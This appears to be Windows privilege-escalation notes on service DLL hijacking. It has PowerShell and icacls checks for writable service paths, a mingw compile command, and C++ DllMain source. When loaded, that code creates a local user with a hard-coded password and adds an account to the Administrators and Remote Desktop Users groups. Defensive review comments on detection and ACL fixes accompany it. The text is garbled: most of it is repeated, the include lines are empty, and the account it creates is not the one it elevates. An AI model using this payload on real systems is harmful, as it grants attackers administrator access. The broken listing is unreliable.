# List running services with the binary each one runs. The finding this page
# is about is a service whose PathName lives in a directory that a
# low-privileged user can write to, so the check is: which of these paths are
# not locked down?
SERVICE DLL HIJACK Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
# Show the ACL on the candidate service binary. Write/modify rights for a
# non-administrative principal are the misconfiguration; restricting that ACL
# is the fix, and without it the DLL below is never loaded.
icacls .\Documents\vuln.exe
# Print PATH. Entries a low-privileged user can write to are part of the same
# finding and should be tightened the same way.
$env:path
# Cross-compile the DllMain listing below (C++ source) into a DLL with mingw-w64.
x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll
#include
#include
// Entry point of the DLL produced by the mingw command above. Only the
// DLL_PROCESS_ATTACH branch does any work: three system() calls in a row.
// Every other reason code is a no-op, and the function always returns TRUE.
//
// NOTE(review): hModule and lpReserved are never read. The int each system()
// returns is stored in i and never checked, so a failing "net" command is
// silent. system() spawns a child command shell from inside DllMain, which the
// Win32 DllMain documentation says not to do (loader lock). From a defender's
// side, that child process (a shell running "net ...") under the service's
// host process, together with Security events 4720 (user account created) and
// 4732 (member added to a security-enabled local group), is the observable
// footprint; the DLL is only reachable while the service binary's directory
// or a PATH entry is writable by a low-privileged user (the icacls and
// $env:path checks above), so fixing those ACLs removes the vector.
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
// Creates a local account named g00f1x with a hard-coded password.
i = system ("net user g00f1x password123! /add");
// Adds the account dave2 to the local Administrators group.
i = system ("net localgroup administrators dave2 /add");
// Adds dave2 to the Remote Desktop Users group as well.
i = system ("net localgroup \"Remote Desktop Users\" \"dave2\" /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
# Show the ACL on the candidate service binary. Write/modify rights for a
# non-administrative principal are the misconfiguration; restricting that ACL
# is the fix, and without it the DLL below is never loaded.
icacls .\Documents\vuln.exe
# Print PATH. Entries a low-privileged user can write to are part of the same
# finding and should be tightened the same way.
$env:path
# Cross-compile the DllMain listing below (C++ source) into a DLL with mingw-w64.
x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll
#include
#include
// Entry point of the DLL produced by the mingw command above. Only the
// DLL_PROCESS_ATTACH branch does any work: three system() calls in a row.
// Every other reason code is a no-op, and the function always returns TRUE.
//
// NOTE(review): hModule and lpReserved are never read. The int each system()
// returns is stored in i and never checked, so a failing "net" command is
// silent. system() spawns a child command shell from inside DllMain, which the
// Win32 DllMain documentation says not to do (loader lock). From a defender's
// side, that child process (a shell running "net ...") under the service's
// host process, together with Security events 4720 (user account created) and
// 4732 (member added to a security-enabled local group), is the observable
// footprint; the DLL is only reachable while the service binary's directory
// or a PATH entry is writable by a low-privileged user (the icacls and
// $env:path checks above), so fixing those ACLs removes the vector.
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
// Creates a local account named g00f1x with a hard-coded password.
i = system ("net user g00f1x password123! /add");
// Adds the account dave2 to the local Administrators group.
i = system ("net localgroup administrators dave2 /add");
// Adds dave2 to the Remote Desktop Users group as well.
i = system ("net localgroup \"Remote Desktop Users\" \"dave2\" /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}